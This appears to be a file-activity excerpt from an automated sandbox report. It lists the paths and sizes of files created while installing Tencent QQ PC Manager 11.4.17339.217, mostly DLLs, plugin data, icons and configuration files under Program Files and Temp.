    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\GFCustom.dll (6693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUAgent.dll (2405 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1383.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NodisturbSGList.etf (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMTrojanScan\QMTrojanScan.tpc (688 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1403.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\supplyID.xml (266 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NodisturbOVList.etf (411 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\msvcr80.dll (7024 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysspeedupjmp\SysSpeedUpJmp.dll (895 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virdex01.def (131 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\HWPlugin.png (565 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\IEStartPage.tpc (707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_133.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ProcInfo.etf (92 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.dll (17297 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\searchlist.dat (990 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\8.0.50727.4053.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.rdb (137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_889.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10001.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDLP.dat (688 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tinyxml.dll (1847 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpkreport.dll (3761 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1230.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1028.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAccountProtection.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\XYConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\Deopt.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_115.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameSpeedup.exe (7044 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmupdatemodule\QMUpdateModule.dll (2786 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftPolicy.etf (286 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\Startup.etf (1826 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1201.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.rdb (53 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDL.exe (2860 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.dll (8386 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMEmMat.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCMgrCmdline.xml (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmspeedupplugin\speeduprocket\SpeedupRocket.tpc (721 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\TPBackImage.png (43 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCSoftMgr.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1755.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\AddMore.png (172 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1009.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tsmscj.DAT (500 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdBlock.exe (5289 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1105.dat (453 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftCmd.exe (3181 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qqpcweiyundiskjmp.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1601.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\libexpatw.dll (1185 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\BlueList.lis (28 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QQPCClinic_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\smanalyplugin\SMAnalyPlugin.tpc (707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCmgrInstallGuide.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftTrayTips.ini (17 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1220.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hpiestartpagescan\HPIEStartPageScan.dll (396 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1007.dat (503 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1034.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\DNSHookDomainList2.0.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.dll (3521 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepLib.dat (6386 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\DNFConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield32.png (578 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_298.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubRdbs\speedupmsg.rdb (151 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOBusinessCfg.etf (270 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_2.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TVL00001.tvl (6372 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\softmgr_notify.ico (289 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\HPScanUIPlugin\HPScanUIPlugin.rdb (6186 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.prf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftMgr.rdb (308 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameFilter.etf (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMEmMat.dll (2129 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\BugReportRule.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMNetMobileFlux.png (989 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1016.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAccountProtection.rdb (3755 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDlder.dll (1387 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMRepairPlugin.dll (1862 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftConfig.exe (6588 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1073.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1400.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1602.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1891.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.rdb (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\GameSpeedupExposure.dll (4872 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenInfo.xml (202 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRouterMgr.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmsoftmgrupdate\QMSoftMgrUpdate.dll (3585 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1018.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virsrc00.def (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPersonalCenter.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysSpeedUp\SysSpeedUp.rdb (68 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\cpumark.etf (32 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\QMHPGarbageScan\QMHPGarbageScan.dll (2367 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysOptimize\SysOptimize.dll (765 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRTP.exe (3900 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_87.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGuide.rdb (273 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRouterLogic.dll (6398 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\dr.dll (1718 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTraceClearDll.dll (5871 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SpeedupPlugins.etf (796 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.tpc (715 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant.rdb (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCCommonMgr.rdb (15370 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\MyPhone.ico (292 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1106.dat (453 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\WebFireWallForRtp.dat (998 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMExtInstaller.dll (4490 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\CommonCallback.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.tpc (716 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\Win10Tips.png (940 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQBrowserWebInstaller.exe (2115 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\macband.txt (35 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\TraceClear\TraceClear.dll (3547 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QQPCNetFlow.exe (8042 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAppPluginInfo.xml (969 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1011.dat (1 bytes)
    C:\$ConvertToNonresident (3120 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\libexpatw.dll (2489 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1436.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\SupportDomain.xml (283 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hpswscanplugin\HPSWScanPlugin.dll (3769 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.rdb (130 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCHwNetwork.dll (1361 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMProtect.dll (1640 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\jgImage.dll (45 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\NetRepairPage.js (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.rdb (228 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHIPSHeart.dll (4428 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\QMProcessRunningTime.dll (1259 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FileLinkRepair.etf (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\MenuManager.png (789 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hptrojanscan\HPTrojanScanInfo.xml (62 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qqpclaunch.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMLDPatch.dll (339 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\jsfeature.xml (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVCache.dll (4782 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\PackageUpdate.dat (1834 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCVulPlugin\QMSCVulPlugin.tpc (707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRepair.rdb (37 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\sqlite.dll (6117 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMNetConnect.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinic.dat (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftVerInfo.etf (33 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRouterMgr.exe (5140 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMNewsTips\QMNewsTips.rdb (22 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\libpng.dll (1127 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\WechatBackup.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSysOptimize.rdb (255 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftGame.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDeskTopGC.exe (5958 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOBusinessCfgV2.etf (601 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\CFConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdBlock.rdb (1704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\Common.dll (17235 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMTrojanScan\QMinfo.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\sm01.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinicHelper.exe (74 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\SoftMon.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_771.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QQPCCommonMgr.rdb (15253 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFileMon.dll (7662 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrayDetector\QMTrayDetector.dll (2318 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\Microsoft.VC80.ATL.Manifest (466 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSRunner.DAT (717 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\communic.dll (878 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\msvcm80.dll (4106 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ptrate.dll (1845 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMChExt.exe (3555 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMContextScan.dll (1928 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameUpgradeTrayPlugin\GameUpgradeTrayPlugin.dll (3218 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_660.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TxArp5_m.inf (940 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\AGEConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\GameHardwareInfo.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\HomePageRecommendItems.xml (652 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\CommonDef.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\QMInsys.sys (1312 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSUrlLib.DAT (15 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10483.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield128.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibwhiteac.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\logodef.ico (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1033.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\arkGraphic.dll (4546 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.dll (2775 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMMobileTrayPlugin\QMConnectTipsConfig.dat (520 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\WebShieldCFG.dat (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\AndroidAssistHelper.dll (5950 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10482.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\startupmgr.tpc (879 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMContextUninstall64.dll (1054 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1030.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMClinicCore.dll (9658 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\MalwareLogic.dll (2849 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\RefuseInjectShell.DAT (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftMgr.exe (13399 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCClinicNetRepair\QQPCClinicNetRepair.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1088.dat (449 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAutoClean.exe (2058 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1084.dat (453 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SysMalwareJmp.png (832 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\sm10.dat (10 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepProv.dat (32 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1001.dat (7 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle71.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_123.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDLP.rdb (32 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\TSVulFW.DAT (3752 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\AppMarketPlugin.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\qmcloudinter\QMCloudInter.dll (5851 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\HPInternalScan\HPInternalScan.dll (2730 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMEmKit.dll (2153 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Redusem.ini (25 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.rdb (23 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_587.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\StartupMgrDll.dll (3862 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\DownloaderMgrUI\DownloaderMgrUI.dll (5199 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCLeakScan.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\TPBrowser.dat (699 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_125.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\zspic.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_190.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SpeedupNetflowLimit.etf (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\8.0.50727.4053.Policy (804 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMNetflowOpti.png (928 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.tpc (665 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.dll (2464 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1025.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\arkGraphic.dll (3882 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCfixUI.dll (2328 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\Common.dll (15137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMRouterPlugin\QMRouterPlugin.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QQPCSoftMgr_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\KingRoot.png (878 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QmTtInterface.dll (1129 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibcss.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCAVSetting.rdb (106 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.dll (7016 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\softmgr.ico (289 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAssLibHlp.dll (623 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.1.prf (15 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibcssac.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\libpng.dll (2481 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\jgImage.dll (1436 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMMain.dll (18406 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hptrojanscan\HPTrojanScan.dll (1660 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\exnscan.dll (3783 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NetRepair.exe (5985 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1222.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\sm03.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftMgr.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\PrefetchConfig.etf (1 bytes)
